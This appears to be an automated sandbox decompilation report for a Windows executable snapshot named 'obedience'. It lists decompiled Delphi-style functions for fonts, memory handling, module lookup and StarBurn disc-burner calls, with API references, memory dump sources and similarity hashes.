      • Opcode ID: 81247c173709a16cd11bedd831dfea622b68d133b2701008e0eca43815109d55
      • Instruction ID: 633b8df58b9ed23893774f6be9a26f0b9510b9416ecbb4af2a38aae6d3ff9e2a
      • Opcode Fuzzy Hash: 81247c173709a16cd11bedd831dfea622b68d133b2701008e0eca43815109d55
      • Instruction Fuzzy Hash: 6CF0FE74A84711BEF7606BA4ED07F1736949730B1EF10053BF118791D2D7F92884865E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
      			E0042C654(struct HDC__* __eax) {
      				intOrPtr _v32;
      				void* _t4;
      				intOrPtr _t7;
      				struct HDC__* _t8;
      				struct tagTEXTMETRICA* _t9;
      
      				_t7 = 1;
      				_push(0);
      				L00407658();
      				_t8 = __eax;
      				if(__eax != 0) {
      					_t4 =  *0x4908a4; // 0x58a00b4
      					if(SelectObject(__eax, _t4) != 0 && GetTextMetricsA(_t8, _t9) != 0) {
      						_t7 = _v32;
      					}
      					_push(_t8);
      					_push(0);
      					L004078C0();
      				}
      				return _t7;
      			}

      0x0042c659
      0x0042c65b
      0x0042c65d
      0x0042c662
      0x0042c666
      0x0042c668
      0x0042c676
      0x0042c683
      0x0042c683
      0x0042c687
      0x0042c688
      0x0042c68a
      0x0042c68a
      0x0042c696

      APIs
      • 73BEAC50.USER32(00000000), ref: 0042C65D
      • SelectObject.GDI32(00000000,058A00B4), ref: 0042C66F
      • GetTextMetricsA.GDI32(00000000), ref: 0042C67A
      • 73BEB380.USER32(00000000,00000000,00000000,058A00B4,00000000), ref: 0042C68A
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380MetricsObjectSelectText
      • String ID:
      • API String ID: 3841012960-0
      • Opcode ID: ccbd5ef70bd8c45dfd4dee1ebf37b600c2f99c8b9c47af743296eea331a48729
      • Instruction ID: 1330267a3721a75eba3b3f094e9377b0bc5d2bf342b09ef4b79a6e6bbefe7c67
      • Opcode Fuzzy Hash: ccbd5ef70bd8c45dfd4dee1ebf37b600c2f99c8b9c47af743296eea331a48729
      • Instruction Fuzzy Hash: CEE04811B475712AD51131751C82BAF264C4F127A5F491636FD44AA6C1D51EDD0483FF
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00407A4C(void* __eax, int __ecx, long __edx) {
      				void* _t2;
      				void* _t4;
      
      				_t2 = GlobalHandle(__eax);
      				GlobalUnWire(_t2);
      				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
      				GlobalFix(_t4);
      				return _t4;
      			}

      0x00407a4f
      0x00407a56
      0x00407a5b
      0x00407a61
      0x00407a66

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Global$AllocHandleWire
      • String ID:
      • API String ID: 2210401237-0
      • Opcode ID: 06cb8f056fea398f8c2afd8d71e10811086597bdb6ea6dde3b237863fa053c4a
      • Instruction ID: 7b2c75872dfc9c524567df3e3f0fb096a1644f641fac76eba40984c8169f81d5
      • Opcode Fuzzy Hash: 06cb8f056fea398f8c2afd8d71e10811086597bdb6ea6dde3b237863fa053c4a
      • Instruction Fuzzy Hash: 5FB009F4C9830439EA0533B64C8FD3B102C989874938049AE3440BA3C2987DBC40803F
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E00425B40(void* __eax, void* __ebx, void* __ecx) {
      				signed int _v8;
      				struct tagLOGFONTA _v68;
      				char _v72;
      				char _v76;
      				char _v80;
      				intOrPtr _t76;
      				intOrPtr _t81;
      				void* _t107;
      				void* _t116;
      				intOrPtr _t126;
      				void* _t137;
      				void* _t138;
      				intOrPtr _t139;
      
      				_t137 = _t138;
      				_t139 = _t138 + 0xffffffb4;
      				_v80 = 0;
      				_v76 = 0;
      				_v72 = 0;
      				_t116 = __eax;
      				_push(_t137);
      				_push(0x425cc9);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t139;
      				_v8 =  *((intOrPtr*)(__eax + 0x10));
      				if( *((intOrPtr*)(_v8 + 8)) != 0) {
      					 *[fs:eax] = 0;
      					_push(0x425cd0);
      					return E00404A64( &_v80, 3);
      				} else {
      					_t76 =  *0x4908dc; // 0x2480a30
      					E00424E60(_t76);
      					_push(_t137);
      					_push(0x425ca1);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t139;
      					if( *((intOrPtr*)(_v8 + 8)) == 0) {
      						_v68.lfHeight =  *(_v8 + 0x14);
      						_v68.lfWidth = 0;
      						_v68.lfEscapement = 0;
      						_v68.lfOrientation = 0;
      						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
      							_v68.lfWeight = 0x190;
      						} else {
      							_v68.lfWeight = 0x2bc;
      						}
      						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
      						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
      						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
      						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
      						E00404CA4( &_v72, _v8 + 0x1b);
      						if(E00408EAC(_v72, "Default") != 0) {
      							E00404CA4( &_v80, _v8 + 0x1b);
      							E00409ADC( &(_v68.lfFaceName), _v80);
      						} else {
      							E00404CA4( &_v76, "\rMS Sans Serif");
      							E00409ADC( &(_v68.lfFaceName), _v76);
      						}
      						_v68.lfQuality = 0;
      						_v68.lfOutPrecision = 0;
      						_v68.lfClipPrecision = 0;
      						_t107 = E00425E24(_t116) - 1;
      						if(_t107 == 0) {
      							_v68.lfPitchAndFamily = 2;
      						} else {
      							if(_t107 == 1) {
      								_v68.lfPitchAndFamily = 1;
      							} else {
      								_v68.lfPitchAndFamily = 0;
      							}
      						}
      						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
      					}
      					_pop(_t126);
      					 *[fs:eax] = _t126;
      					_push(0x425ca8);
      					_t81 =  *0x4908dc; // 0x2480a30
      					return E00424E6C(_t81);
      				}
      			}

      0x00425b41
      0x00425b43
      0x00425b49
      0x00425b4c
      0x00425b4f
      0x00425b52
      0x00425b56
      0x00425b57
      0x00425b5c
      0x00425b5f
      0x00425b65
      0x00425b6f
      0x00425cb3
      0x00425cb6
      0x00425cc8
      0x00425b75
      0x00425b75
      0x00425b7a
      0x00425b81
      0x00425b82
      0x00425b87
      0x00425b8a
      0x00425b94
      0x00425ba0
      0x00425ba5
      0x00425baa
      0x00425baf
      0x00425bb9
      0x00425bc4
      0x00425bbb
      0x00425bbb
      0x00425bbb
      0x00425bd5
      0x00425be2
      0x00425bef
      0x00425bf8
      0x00425c04
      0x00425c18
      0x00425c3d
      0x00425c48
      0x00425c1a
      0x00425c22
      0x00425c2d
      0x00425c2d
      0x00425c4d
      0x00425c51
      0x00425c55
      0x00425c60
      0x00425c62
      0x00425c6a
      0x00425c64
      0x00425c66
      0x00425c70
      0x00425c68
      0x00425c76
      0x00425c76
      0x00425c66
      0x00425c86
      0x00425c86
      0x00425c8b
      0x00425c8e
      0x00425c91
      0x00425c96
      0x00425ca0
      0x00425ca0

      APIs
        • Part of subcall function 00424E60: RtlEnterCriticalSection.KERNEL32(?,00424E9D), ref: 00424E64
      • CreateFontIndirectA.GDI32(?), ref: 00425C7E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateCriticalEnterFontIndirectSection
      • String ID: MS Sans Serif$Default
      • API String ID: 2931345757-2137701257
      • Opcode ID: 932ff50f0bb9c49dc5642c760928c94e8775376fe361992fd486c25b49345ba6
      • Instruction ID: 819dd83016e267e1a5c97b67b4ce15c7fda616d82968a268d7875e40e96a78e7
      • Opcode Fuzzy Hash: 932ff50f0bb9c49dc5642c760928c94e8775376fe361992fd486c25b49345ba6
      • Instruction Fuzzy Hash: 0C514C70B04788DFDB01DFA5D585B8DBBF5AF49304FA580AAD800A7352E3789E05CB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E0040D000(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
      				char _v8;
      				intOrPtr _v12;
      				struct _MEMORY_BASIC_INFORMATION _v40;
      				char _v301;
      				char _v308;
      				intOrPtr _v312;
      				char _v316;
      				char _v320;
      				char _v324;
      				intOrPtr _v328;
      				char _v332;
      				void* _v336;
      				char _v340;
      				char _v344;
      				char _v348;
      				char _v352;
      				intOrPtr _v356;
      				char _v360;
      				char _v364;
      				char _v368;
      				void* _v372;
      				char _v376;
      				intOrPtr _t55;
      				intOrPtr _t65;
      				intOrPtr _t88;
      				intOrPtr _t92;
      				intOrPtr _t95;
      				intOrPtr _t107;
      				void* _t114;
      				void* _t115;
      				void* _t118;
      
      				_t115 = __esi;
      				_t114 = __edi;
      				_t98 = __ecx;
      				_v376 = 0;
      				_v340 = 0;
      				_v348 = 0;
      				_v344 = 0;
      				_v8 = 0;
      				_push(_t118);
      				_push(0x40d1c3);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t118 + 0xfffffe8c;
      				_t95 =  *((intOrPtr*)(_a4 - 4));
      				if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
      					_t55 =  *0x48f850; // 0x407de4
      					E00406A3C(_t55, __ecx,  &_v8);
      				} else {
      					_t92 =  *0x48f9e4; // 0x407ddc
      					E00406A3C(_t92, __ecx,  &_v8);
      				}
      				_v12 =  *((intOrPtr*)(_t95 + 0x18));
      				VirtualQuery( *(_t95 + 0xc),  &_v40, 0x1c);
      				if(_v40.State != 0x1000 || GetModuleFileNameA(_v40.AllocationBase,  &_v301, 0x105) == 0) {
      					_v372 =  *(_t95 + 0xc);
      					_v368 = 5;
      					_v364 = _v8;
      					_v360 = 0xb;
      					_v356 = _v12;
      					_v352 = 5;
      					_t65 =  *0x48f860; // 0x407d8c
      					E00406A3C(_t65, _t98,  &_v376);
      					E0040CC28(_t95, _v376, 1, _t114, _t115, 2,  &_v372);
      				} else {
      					_v336 =  *(_t95 + 0xc);
      					_v332 = 5;
      					E00404CB0( &_v344, 0x105,  &_v301);
      					E00409908(_v344, 0x105,  &_v340);
      					_v328 = _v340;
      					_v324 = 0xb;
      					_v320 = _v8;
      					_v316 = 0xb;
      					_v312 = _v12;
      					_v308 = 5;
      					_t88 =  *0x48f8d4; // 0x407e8c
      					E00406A3C(_t88, 0x105,  &_v348);
      					E0040CC28(_t95, _v348, 1, _t114, _t115, 3,  &_v336);
      				}
      				_pop(_t107);
      				 *[fs:eax] = _t107;
      				_push(E0040D1CA);
      				E00404A40( &_v376);
      				E00404A64( &_v348, 3);
      				return E00404A40( &_v8);
      			}

      0x0040d000
      0x0040d000
      0x0040d000
      0x0040d00c
      0x0040d012
      0x0040d018
      0x0040d01e
      0x0040d024
      0x0040d029
      0x0040d02a
      0x0040d02f
      0x0040d032
      0x0040d038
      0x0040d03f
      0x0040d053
      0x0040d058
      0x0040d041
      0x0040d044
      0x0040d049
      0x0040d049
      0x0040d060
      0x0040d06d
      0x0040d079
      0x0040d138
      0x0040d13e
      0x0040d148
      0x0040d14e
      0x0040d158
      0x0040d15e
      0x0040d174
      0x0040d179
      0x0040d18b
      0x0040d09c
      0x0040d09f
      0x0040d0a5
      0x0040d0bd
      0x0040d0ce
      0x0040d0d9
      0x0040d0df
      0x0040d0e9
      0x0040d0ef
      0x0040d0f9
      0x0040d0ff
      0x0040d115
      0x0040d11a
      0x0040d12c
      0x0040d131
      0x0040d194
      0x0040d197
      0x0040d19a
      0x0040d1a5
      0x0040d1b5
      0x0040d1c2

      APIs
      • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D1C3), ref: 0040D06D
      • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D1C3), ref: 0040D08F
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileLoadModuleNameQueryStringVirtual
      • String ID: }@
      • API String ID: 902310565-142398135
      • Opcode ID: 38891e223d590285da77923b28cd5655d6eead6a4f9a78662bf517dc28cb9e7b
      • Instruction ID: 8ab2fe247369d51e40cffcec1e791ba1a36e1af89c2d2c0800f3205da171578f
      • Opcode Fuzzy Hash: 38891e223d590285da77923b28cd5655d6eead6a4f9a78662bf517dc28cb9e7b
      • Instruction Fuzzy Hash: 2351E370A04658DFDB60DB68CD85BCAB7F4AB49304F4045EAE508BB381D774AE88CF55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 64%
      			E00482214(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
      				char _v8;
      				char _v12;
      				intOrPtr _v16;
      				char _v20;
      				intOrPtr _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				intOrPtr _t52;
      				char _t58;
      				intOrPtr _t93;
      				char _t100;
      				intOrPtr _t115;
      				intOrPtr* _t121;
      				intOrPtr _t123;
      				void* _t126;
      
      				_push(__ebx);
      				_push(__esi);
      				_v36 = 0;
      				_v8 = 0;
      				_t121 = __eax;
      				_push(_t126);
      				_push(0x482361);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t126 + 0xffffffe0;
      				E00481DC4( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x10)) + 0x18)), __ebx, __eax, __esi, __fp0);
      				_t52 =  *0x490c50; // 0x0
      				E0047FD7C(_t52, __ebx, 0, "CdvdBurnerGrabber_Eject", _t121, __esi, __fp0);
      				_t123 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18));
      				_push(_t123 + 0x4e8);
      				_push(_t123 + 0xe4);
      				_push(0x400);
      				_push(_t123 + 0xe8);
      				_t58 =  *((intOrPtr*)(_t123 + 0xd8));
      				_push(_t58);
      				L00465E84();
      				_t100 = _t58;
      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 0xe0)) = _t100;
      				if(_t100 == 0) {
      					E00409668(0x3b35,  &_v36);
      					E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 4, _v36);
      					 *((intOrPtr*)( *_t121 + 0x14))();
      				} else {
      					_v32 = 0;
      					_v28 = 0;
      					_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 0xe4));
      					_v20 = 0;
      					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 0xe8;
      					_v12 = 6;
      					E0040A164("StarBurn_CdvdBurnerGrabber_Eject() failed, exception %d, status %d, text \"%s\"", 2,  &_v32,  &_v8);
      					E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 4, _v8);
      					_t93 =  *0x490c50; // 0x0
      					E0047FD7C(_t93, _t100, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 4)), _t121, _t123, __fp0);
      					 *((intOrPtr*)( *_t121 + 0x14))();
      				}
      				_pop(_t115);
      				 *[fs:eax] = _t115;
      				_push(0x482368);
      				E00404A40( &_v36);
      				return E00404A40( &_v8);
      			}

      APIs
        • Part of subcall function 00481DC4: StarBurn_CdvdBurnerGrabber_Release.STARBURN(00000000,0048172F,00000400,00000000,?,00000000,00481EB6), ref: 00481E23
      • StarBurn_CdvdBurnerGrabber_Eject.STARBURN(?,?,00000400,?,?,00000000,00482361), ref: 00482278
      Strings
      • StarBurn_CdvdBurnerGrabber_Eject() failed, exception %d, status %d, text "%s", xrefs: 004822CF
      • CdvdBurnerGrabber_Eject, xrefs: 00482242
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdGrabber_Star$EjectRelease
      • String ID: CdvdBurnerGrabber_Eject$StarBurn_CdvdBurnerGrabber_Eject() failed, exception %d, status %d, text "%s"
      • API String ID: 2971828438-1604757720
      • Opcode ID: 794b6099cb0b181bc9408f236dbb428ea4c321841b4a9951a60fa6dcec228043
      • Instruction ID: 05de91d9fc0a0eac51ca9a4d766eca4f8282f15ed9dd885b846f1a446a54e838
      • Opcode Fuzzy Hash: 794b6099cb0b181bc9408f236dbb428ea4c321841b4a9951a60fa6dcec228043
      • Instruction Fuzzy Hash: 9F4119746006459FCB04DF69C881E8AB7F8FF59304F118966E905EB362D778ED44CBA8
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 73%
      			E0042F268(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				char _v12;
      				intOrPtr _t27;
      				intOrPtr* _t40;
      				intOrPtr _t55;
      				struct HDC__* _t61;
      				char _t65;
      				intOrPtr _t71;
      				void* _t73;
      				intOrPtr* _t82;
      				intOrPtr _t84;
      				void* _t87;
      				void* _t90;
      
      				_push(__ebx);
      				_push(__esi);
      				_push(__edi);
      				_v12 = 0;
      				_t65 = __edx;
      				_t84 = __eax;
      				_push(_t87);
      				_push(0x42f386);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t87 + 0xfffffff8;
      				_t27 =  *((intOrPtr*)(__eax + 0x1f));
      				if(__edx == _t27) {
      					L21:
      					_pop(_t71);
      					 *[fs:eax] = _t71;
      					_push(0x42f38d);
      					return E00404A40( &_v12);
      				}
      				_t82 = 0;
      				_t73 = __edx - 1;
      				_t90 = _t73;
      				if(_t90 < 0) {
      					E0042F394(__eax, 0);
      					_t33 =  *((intOrPtr*)(_t84 + 4));
      					if( *((intOrPtr*)(_t84 + 4)) != 0) {
      						E00426B80(_t33, 0);
      					}
      					DeleteDC( *(_t84 + 0x20));
      					 *(_t84 + 0x20) = 0;
      					L15:
      					if(_t82 != 0) {
      						_t40 = E0042F804(_t84, _t65, _t82, _t84);
      						_t69 =  *_t40;
      						_v8 =  *((intOrPtr*)( *_t40 + 0x18))(E0042F7EC(_t84));
      						 *(_t84 + 0x20) =  *_t82(E00404F00( *((intOrPtr*)(_v8 + 4))), E00404F00( *((intOrPtr*)(_v8 + 8))), E00404F00( *((intOrPtr*)(_v8 + 0xc))),  *((intOrPtr*)(_t84 + 0x24)));
      						if( *(_t84 + 0x20) == 0) {
      							_t55 =  *0x48f8d8; // 0x423b50
      							E00406A3C(_t55, _t69,  &_v12);
      							E0042EE58(_v12);
      						}
      						_t53 =  *((intOrPtr*)(_t84 + 4));
      						if( *((intOrPtr*)(_t84 + 4)) != 0) {
      							E00426B80(_t53,  *(_t84 + 0x20));
      						}
      					}
      					 *((char*)(_t84 + 0x1f)) = _t65;
      					goto L21;
      				}
      				if(_t90 == 0) {
      					if(_t27 == 2) {
      						goto L21;
      					}
      					_t82 = 0x4072b0;
      				} else {
      					if(_t73 == 1) {
      						_t60 =  *((intOrPtr*)(__eax + 4));
      						if( *((intOrPtr*)(__eax + 4)) != 0) {
      							E00426B80(_t60, 0);
      						}
      						_t61 =  *(_t84 + 0x20);
      						if(_t61 != 0) {
      							DeleteDC(_t61);
      						}
      						_t82 = 0x407288;
      					}
      				}
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Delete
      • String ID: P;B
      • API String ID: 1035893169-933050406
      • Opcode ID: f3b8355d58d3c00a084bfce6db8ec6833bbc41ccdf93afec228cd5781de190da
      • Instruction ID: 81d3044a3e4a01bd40b3398aa3727effb27b7a822c1a31dc278907b68eb3dad7
      • Opcode Fuzzy Hash: f3b8355d58d3c00a084bfce6db8ec6833bbc41ccdf93afec228cd5781de190da
      • Instruction Fuzzy Hash: 713170347046209FC720EB2AE841A1BB7F9AF897107E546BEB849D3751DB39EC058A1C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 75%
      			E004823E8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
      				char _v8;
      				char _v12;
      				char _v16;
      				intOrPtr _v20;
      				char _v24;
      				intOrPtr _v28;
      				char _v32;
      				signed int _v36;
      				intOrPtr* _t45;
      				intOrPtr _t58;
      				char _t64;
      				intOrPtr _t84;
      				intOrPtr* _t87;
      				intOrPtr _t102;
      				intOrPtr _t108;
      				intOrPtr _t111;
      				void* _t112;
      				void* _t114;
      
      				_v12 = 0;
      				_v8 = 0;
      				_t87 = __eax;
      				 *[fs:eax] = _t114 + 0xffffffe0;
      				_t45 =  *0x48f84c; // 0x490c48
      				E0047FAFC( *_t45, 0x64);
      				E00409668(0x3b2b,  &_v8);
      				E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 4, _v8);
      				 *((intOrPtr*)( *_t87 + 0x14))( *[fs:eax], 0x482527, _t114, __edi, __esi, __ebx, _t112);
      				_t58 =  *0x490c50; // 0x0
      				E0047FD7C(_t58, _t87, 0, "CdvdBurnerGrabber_CloseSession", __edi,  *_t87, __fp0);
      				_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18));
      				_push(_t111 + 0x4e8);
      				_push(_t111 + 0xe4);
      				_push(0x400);
      				_push(_t111 + 0xe8);
      				_t64 =  *((intOrPtr*)(_t111 + 0xd8));
      				_push(_t64);
      				L00465E7C();
      				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18));
      				 *((char*)(_t108 + 0xe0)) = _t64;
      				if( *( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 0xe0) != 0) {
      					_v36 =  *( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 0xe0) & 0x000000ff;
      					_v32 = 0;
      					_v28 =  *((intOrPtr*)(_t108 + 0xe4));
      					_v24 = 0;
      					_v20 = _t108 + 0xe8;
      					_v16 = 6;
      					E0040A164("StarBurn_CdvdBurnerGrabber_CloseSession() failed, exception %d, status %d, text \"%s\"\\n", 2,  &_v36,  &_v12);
      					E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 4, _v12);
      					_t84 =  *0x490c50; // 0x0
      					E0047FD7C(_t84, _t87, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 4)), _t108, _t111, __fp0);
      				}
      				_pop(_t102);
      				 *[fs:eax] = _t102;
      				_push(0x48252e);
      				return E00404A64( &_v12, 2);
      			}

      APIs
      • StarBurn_CdvdBurnerGrabber_CloseSession.STARBURN(?,?,00000400,?,?), ref: 00482482
      Strings
      • StarBurn_CdvdBurnerGrabber_CloseSession() failed, exception %d, status %d, text "%s"\n, xrefs: 004824DC
      • CdvdBurnerGrabber_CloseSession, xrefs: 0048244C
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
